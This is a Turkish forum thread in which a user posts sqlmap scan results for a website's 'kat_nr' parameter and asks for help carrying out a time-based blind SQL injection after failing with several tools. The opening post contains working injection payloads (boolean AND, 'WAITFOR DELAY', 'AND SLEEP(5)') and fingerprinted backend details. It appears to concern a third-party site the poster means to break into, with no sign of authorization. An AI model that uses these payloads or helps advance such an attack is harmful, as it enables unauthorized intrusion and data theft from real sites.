Mysql Time-Based Blind İnjection Yardım

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Allura
    Allura's avatar
    Kayıt Tarihi: 17/Mayıs/2009
    Erkek

    Place: GET

    Parameter: kat_nr

        Type: boolean-based blind

        Title: AND boolean-based blind - WHERE or HAVING clause

        Payload: kat_nr=2 AND 5123=5123

     

        Type: stacked queries

        Title: Microsoft SQL Server/Sybase stacked queries

        Payload: kat_nr=2; WAITFOR DELAY '0:0:5';--

     

        Type: AND/OR time-based blind

        Title: MySQL > 5.0.11 AND time-based blind

        Payload: kat_nr=2 AND SLEEP(5)

    ---

     

    [05:19:41] [INFO] the back-end DBMS is MySQL

    web server operating system: Windows Vista

    web application technology: ASP.NET, ASP, Microsoft IIS 7.0

    back-end DBMS: MySQL 5.0.11

    [05:19:41] [WARNING] HTTP error codes detected during testing:

    500 (Internal Server Error) - 29 times

    [05:19:41] [INFO] Fetched data logged to text files under 'C:\Python26\output\xx'

     

    [*] shutting down at: 05:19:41

    --------------------
    Merhabalar, sql injection konusunda uzman olan arkadaşlar bu konuda yardımcı olabilirler ise sevinirim.
     Sql injection uygulanması gereken siteye bilindik, sqlmap ile bir tarama çıktısı aldım, genelde integer, integer gibi basit sql açıkları gösterirdi ancak bu kez beni aşan bir yöntem ile karşılaştım.
    MySQL time-based blind injection, yane zaman tabanlı blind injection program recommened süre olarak 5000ms önerdi bir kaç program ile denedim ancak başarızı sonuç aldım. Yardımcı olabilecek arkadaşlar konuya bildirirlerse sevinirim.
    Teşekkürler.


    "
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Allura
    Allura's avatar
    Kayıt Tarihi: 17/Mayıs/2009
    Erkek

    Pump it


    "
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Twitter
    Twitter's avatar
    Kayıt Tarihi: 13/Ekim/2007
    Erkek

    Böyle bir konu açmıştım zamanında hocam umaırm yardımcın olur..

    http://www.tahribat.com/Forum-Zaman-Tabanli-Blind-Sql-Injection-137709/


    Part Time Engineer, Full Time Dreamer ..
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Allura
    Allura's avatar
    Kayıt Tarihi: 17/Mayıs/2009
    Erkek

    Twitter bunu yazdı:
    -----------------------------

    Böyle bir konu açmıştım zamanında hocam umaırm yardımcın olur..

    http://www.tahribat.com/Forum-Zaman-Tabanli-Blind-Sql-Injection-137709/


    -----------------------------

     

    Böyle Bir Konu Yok, Belkide Hiç Olmadı, Belki Biri Sizi Kekliyo, Belki Adminler Tarafından Silinmiştir, Belki Sıkıntılı İçerikden Dolayı Yayından Kaldırılmıştır, Hepsi Olabilir :) ...(D3)

     

    pöfff. :)


    "
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Cosmic
    Cosmic's avatar
    Kayıt Tarihi: 14/Haziran/2006
    Erkek

    Allura bunu yazdı:
    -----------------------------

    Twitter bunu yazdı:
    -----------------------------

    Böyle bir konu açmıştım zamanında hocam umaırm yardımcın olur..

    http://www.tahribat.com/Forum-Zaman-Tabanli-Blind-Sql-Injection-137709/


    -----------------------------

     

     

    Böyle Bir Konu Yok, Belkide Hiç Olmadı, Belki Biri Sizi Kekliyo, Belki Adminler Tarafından Silinmiştir, Belki Sıkıntılı İçerikden Dolayı Yayından Kaldırılmıştır, Hepsi Olabilir :) ...(D3)

     

    pöfff. :)


    -----------------------------

    login olmayı dene :) www. süz loginsin :)


    Bittik biz bittik
Toplam Hit: 1829 Toplam Mesaj: 5